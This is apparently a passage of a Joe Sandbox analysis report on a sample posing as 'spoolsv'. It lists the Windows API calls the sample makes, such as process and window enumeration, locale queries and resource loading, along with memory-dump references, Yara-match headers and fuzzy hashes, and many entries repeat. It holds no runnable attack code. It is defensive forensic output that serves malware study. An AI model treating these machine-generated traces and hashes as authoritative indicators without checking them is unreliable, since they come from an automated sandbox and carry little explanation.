                                                • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                • EnumCalendarInfoA.KERNEL32(Function_0000D100,00000000,00000000,00000004), ref: 0042E207
                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_0000D100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread$CalendarEnum
                                                • String ID:
                                                • API String ID: 4102113445-0
                                                • Opcode ID: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                • Opcode Fuzzy Hash: 1fe0cd520dcb76599e1cb0b27a2e36b6943e2181db81a567f1781bde662632bb
                                                • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E24B,?,?,00000000), ref: 0042E1CC
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                • GetThreadLocale.KERNEL32(00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E1FC
                                                • EnumCalendarInfoA.KERNEL32(Function_0002E100,00000000,00000000,00000004), ref: 0042E207
                                                • GetThreadLocale.KERNEL32(00000000,00000003,Function_0002E100,00000000,00000000,00000004,00000000,0042E24B,?,?,00000000), ref: 0042E225
                                                • EnumCalendarInfoA.KERNEL32(0042E13C,00000000,00000000,00000003), ref: 0042E230
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread$CalendarEnum
                                                • String ID:
                                                • API String ID: 4102113445-0
                                                • Opcode ID: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                • Instruction ID: 3b592c89afa61212c91c90111c7eadeea7ef6b57bd96fa3973e5640d51e683ed
                                                • Opcode Fuzzy Hash: 570fafb30c039016a534684b3b436d893a8f8b07cf5ba7035df7416a7fa93ff0
                                                • Instruction Fuzzy Hash: 83014230304234ABE302AA72FD13F6E725CDB46728FE106AAF401966C9DA3C9E0141BC
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: eeee$ggg$yyyy
                                                • API String ID: 4232894706-1253427255
                                                • Opcode ID: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                • Opcode Fuzzy Hash: 85814b5940fb8fb1132efeca7088a26c00a9b99c439e5e332741e8934f1202d7
                                                • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                APIs
                                                • GetThreadLocale.KERNEL32(?,00000000,0042E42E,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 0042E293
                                                  • Part of subcall function 0042DF2C: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0042DF4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Locale$InfoThread
                                                • String ID: eeee$ggg$yyyy
                                                • API String ID: 4232894706-1253427255
                                                • Opcode ID: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                • Instruction ID: 3cba33255c9bbdf1d265809368eb21140498f1bac8e05f245d93c13f2708a2d5
                                                • Opcode Fuzzy Hash: 46c053b22e6d49fbb08b1bec16dba0f949549f1e4e205da2495e25bbd6054d76
                                                • Instruction Fuzzy Hash: 1F41F3707044358BD711FA6BB8862BEA396DB88308BE4443BE841C7346DB7CDD02966E
                                                APIs
                                                • GetWindowThreadProcessId.USER32(?,?), ref: 004E72B0
                                                • GetClassNameW.USER32(?,?,00000200), ref: 004E732F
                                                • GetWindowTextW.USER32(?,?,00000200), ref: 004E7396
                                                  • Part of subcall function 00425D80: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00425CC7
                                                  • Part of subcall function 00425D80: SysFreeString.OLEAUT32(?), ref: 00425CD9
                                                  • Part of subcall function 00425C04: SysReAllocStringLen.OLEAUT32(-00000008,"lB,?), ref: 00425C1A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: String$AllocWindow$ClassFreeNameProcessTextThread
                                                • String ID: qN
                                                • API String ID: 1689834521-1131524284
                                                • Opcode ID: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                • Instruction ID: 384b602530dd3e7abee933e9cb9e54516736a920c6d3bdd50a0cb6d10c4ed17f
                                                • Opcode Fuzzy Hash: ba3fd72ad012f3a2744c34faa204443ed89ba8ecd1608f0b8314df8e6e7ccf5b
                                                • Instruction Fuzzy Hash: E3415F74A0421D9FCB60EF59C885ED9B3B4EB48304F5085AAE808D7351DB34AE85CF95
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00003A8C), ref: 00424B33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006,00000000), ref: 00424AF6
                                                • UnhandledExceptionFilter.KERNEL32(?,?,?,Function_00024A8C), ref: 00424B33
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction ID: 28f28964fb9d555221dd9afa2c9f472c2addcd39150ca2e06b2f53480767bc07
                                                • Opcode Fuzzy Hash: c899ef61071e8b5665cc88a9d425c867b7d40124ee75cb200501e1cf770727e7
                                                • Instruction Fuzzy Hash: 14316B70704210AFE320DB25E8A4F2BBBE9EBC8714F95859AE54887251C738FC44CA29
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                • API String ID: 1646373207-3712701948
                                                • Opcode ID: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                • Opcode Fuzzy Hash: f784ab39495907c995ffa88e566a7ccb6084cd2a8e8be5d7caf6e143219bf0f8
                                                • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                APIs
                                                • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 0042FE6A
                                                • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 0042FE7B
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AddressHandleModuleProc
                                                • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                • API String ID: 1646373207-3712701948
                                                • Opcode ID: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                • Instruction ID: d05478c2365554a824d123d6fbb6e33ff000ae425a02c21146f90fc1f8f592d2
                                                • Opcode Fuzzy Hash: 410407b10a4238802ec79950a7a5b9178a1e1f7834c8fb41c023dae878659a17
                                                • Instruction Fuzzy Hash: E5D05EB03033214AD3216BA4B981F2F22A48B18304BC2143FA50095333DF7C880D931C
                                                APIs
                                                • FindWindowA.USER32(00000000,?), ref: 004E6F81
                                                  • Part of subcall function 004CF5C8: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000,004E6FF3,00000000,004E719A,?,?,?,?,00000000,00000000), ref: 004CF5D9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E6F32
                                                  • Part of subcall function 004CF608: Process32Next.KERNEL32(00000000,?), ref: 004CF619
                                                • EnumWindows.USER32(004E6C44,?), ref: 004E70AC
                                                  • Part of subcall function 004CF5E8: Process32First.KERNEL32(00000000,00000128), ref: 004CF5F9
                                                • CloseHandle.KERNEL32(00000000), ref: 004E709E
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: CloseHandleProcess32$CreateEnumFindFirstNextSnapshotToolhelp32WindowWindows
                                                • String ID:
                                                • API String ID: 180456925-0
                                                • Opcode ID: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                • Instruction ID: 72b661b911529101ae542200eb1df53ac65a5c9b4dd6d11e1212abbbfab87a01
                                                • Opcode Fuzzy Hash: bce857874febc9ef65dca1d5fc0882558fd2a8988de3f1e326e1dcf040138ab3
                                                • Instruction Fuzzy Hash: A9A1B2347003598BCB21EF5AD881BEFB3B6EF54359F5045AAE80497345DB3CEE458A88
                                                APIs
                                                • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 00431F63
                                                • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 00431F7F
                                                • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 00431FF6
                                                • VariantClear.OLEAUT32(?), ref: 0043201F
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ArraySafe$Bound$ClearIndexVariant
                                                • String ID:
                                                • API String ID: 920484758-0
                                                • Opcode ID: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                • Instruction ID: f3952d494a17d4f816fc107e6549c8048cd253aa9e54a2e5d839202b9fdd8af3
                                                • Opcode Fuzzy Hash: 2feee447eab3e52265c8b21dfcf0193c0ec4a2ec98dec2816468c90f8f6c25a7
                                                • Instruction Fuzzy Hash: 45411E75A0021D9FCB61DB59CC91BC9B3BCAF4C314F0051DAE549A7222DB38AF858F58
                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                • Opcode Fuzzy Hash: ca07ffa398e0464888b7d57e11494c3409e02489f04d24f3075b4b0116595085
                                                • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                APIs
                                                • VirtualQuery.KERNEL32(?,?,0000001C), ref: 0042E4B4
                                                • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0042E4D8
                                                • GetModuleFileNameA.KERNEL32(500051C6), ref: 0042E4F3
                                                • LoadStringA.USER32(00000000,0000FFEA,?,00000100), ref: 0042E597
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FileModuleName$LoadQueryStringVirtual
                                                • String ID:
                                                • API String ID: 3990497365-0
                                                • Opcode ID: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                • Instruction ID: 0850e4095803b7705c879a3a56f47181736bc11e0145708a7747c2fb4996507a
                                                • Opcode Fuzzy Hash: 71d793b9a51522d017f2b3ebce7c07d421730b79dde85717fac32f14e717e1d5
                                                • Instruction Fuzzy Hash: E641E270B002689FDB11DB59DC85BDEB7F9AB48304F8440EAA508E7251D7789F88CF59
                                                APIs
                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                  • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocaleStringThreadType
                                                • String ID:
                                                • API String ID: 1505017576-0
                                                • Opcode ID: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                • Opcode Fuzzy Hash: fe60cc85a5425291f99d297785c3bac38146f42b73dfedf89e738308dbd7c1f2
                                                • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                APIs
                                                • GetStringTypeA.KERNEL32(00000C00,00000002,?,00000080,?), ref: 0042F82E
                                                • GetThreadLocale.KERNEL32 ref: 0042F75E
                                                  • Part of subcall function 0042F6BC: GetCPInfo.KERNEL32(00000000,?), ref: 0042F6D5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: InfoLocaleStringThreadType
                                                • String ID:
                                                • API String ID: 1505017576-0
                                                • Opcode ID: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                • Instruction ID: 2d92115c582512948cd79db13d8c7576cb92c2252ee0582f1964dcb12c82ecca
                                                • Opcode Fuzzy Hash: 5526e12bd0eb839895e88b911c20090cfbd127ba69cb6f86209690220019ef66
                                                • Instruction Fuzzy Hash: F03149217813A98AD7109765BC013E67BE4EB61304FC480BFD544CB3D1EBB9484DEB9A
                                                APIs
                                                • FindResourceA.KERNEL32(?,?,?), ref: 0043E8A3
                                                • LoadResource.KERNEL32(?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8BD
                                                • SizeofResource.KERNEL32(?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8D7
                                                • LockResource.KERNEL32(0043E5F4,00000000,?,0043E930,?,0043E930,?,?,?,00439AD8,?,00000001,00000000,?,0043E7FC,?), ref: 0043E8E1
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Resource$FindLoadLockSizeof
                                                • String ID:
                                                • API String ID: 3473537107-0
                                                • Opcode ID: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                • Instruction ID: 1ca1a7a9c485ca756b6cf2f32b2eaf6a8b809140a0052c2abd4bb8ac9ed98deb
                                                • Opcode Fuzzy Hash: d1ac32caae1db41a845a1abc366ddd52a8dc75b1c6d3fb84acc03b658d8a3728
                                                • Instruction Fuzzy Hash: C8F06DB2606614AF5708EEAEA881D5B77DCDE88364720016FF918C7246DA39DD0183BC
                                                APIs
                                                • GlobalHandle.KERNEL32 ref: 00428CD3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$AllocHandleLockUnlock
                                                • String ID:
                                                • API String ID: 2167344118-0
                                                • Opcode ID: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                • Instruction ID: d653ff63ed22f6af050254ba5540b1362e96b0375665dbbf2afb4746ab74a42f
                                                • Opcode Fuzzy Hash: edb2d445b92f6ada92e558fdefc9802c95ff9a4c9d9968bd340d16882f3fbd4f
                                                • Instruction Fuzzy Hash: 44B002D4B922307DB90433B6EC0BD3F115C9D947097C44A5E7500D2086DC7D9C22407D
                                                APIs
                                                • GlobalHandle.KERNEL32 ref: 00428CD3
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00428CDA
                                                • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00428CDF
                                                • GlobalLock.KERNEL32(00000000), ref: 00428CE5
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Global$AllocHandleLockUnlock
                                                • String ID:
                                                • API String ID: 2167344118-0
                                                • Opcode ID: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                • Instruction ID: 1176041c58d3c6c4e80ae864809d48ff9bb0580384c2a0d59c617645fccee574
                                                • Opcode Fuzzy Hash: 9d486adaf99c31d1bb0b9bdc296577990bf99d711a1a41faa7c6392ece96ab7e
                                                • Instruction Fuzzy Hash: 2FB009D4A922307CB90433B2EC0BE3F211CAC9470A7C48A8E7500E2086DC7DA822807E
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00421000, based on PE: true
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction Fuzzy Hash: 2331A0253046218AF7248A18F584B67B750FBD5311FE78A17D4068B755C72CDC83AB1F
                                                APIs
                                                • UnhandledExceptionFilter.KERNEL32(00000006), ref: 00424EFB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000003.00000002.2217507681.0000000000421000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000003.00000002.2217387641.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.0000000000401000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217409383.000000000041B000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217470998.000000000041F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                • Associated: 00000003.00000002.2217507681.0000000000539000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_3_2_400000_spoolsv.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExceptionFilterUnhandled
                                                • String ID: (B$<"B
                                                • API String ID: 3192549508-3939202322
                                                • Opcode ID: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
                                                • Instruction ID: bfba1fbf0b618b7186db92fc86f7426f612593a5d895cc110b2475d7b5f2d65f
                                                • Opcode Fuzzy Hash: 3e8abf62a20f42c5cc98a29b43955e6726b5e56913c1e936a1f50cd5f84eb9cc
